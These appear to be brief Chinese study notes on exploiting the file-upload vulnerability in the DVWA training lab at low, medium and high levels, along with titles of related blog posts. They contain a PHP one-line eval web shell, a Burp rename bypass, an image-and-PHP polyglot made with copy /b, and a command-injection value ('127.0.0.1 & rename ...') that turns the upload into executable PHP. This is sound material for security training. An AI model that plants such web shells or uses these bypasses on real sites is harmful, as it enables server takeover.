low
直接上传php,使用蚁剑进行连接
123.php
<?php @eval($_POST['attack']);?>
medium
使用burp进行抓包改包
123.jpg 在burp改包成123.php
添加木马路径
使用蚁剑/菜刀进行连接
high
(2条消息) DVWA1.9之文件上传漏洞High级多种方法_文件上传high_晚安這個未知的世界的博客-CSDN博客
(2条消息) 基于DVWA文件上传,包含漏洞,上传一句话木马基础分析_dvwa一句话木马_Alexz__的博客-CSDN博客
DVWA 通关指南:File Upload(文件上传) - 乌漆WhiteMoon - 博客园 (cnblogs.com)
使用抓包改包
但后台有函数进行图片辨别,没有宽高,被识别成假图片 不允许上传
利用一句话木马和图片生成一句话木马图片
在cmd中 copy /b 8888.jpg + 123.php xiaoma.jpg
上传xiaoma.jpg
但是不能解析成php
借助漏洞比如low的命令注入:
127.0.0.1 & rename xiaoma.jpg路径 xiaoma.php
(前提是知道图片地址,在这个案例,上传后就会有地址)
地址栏输入
使用菜刀和蚁剑连接木马的链接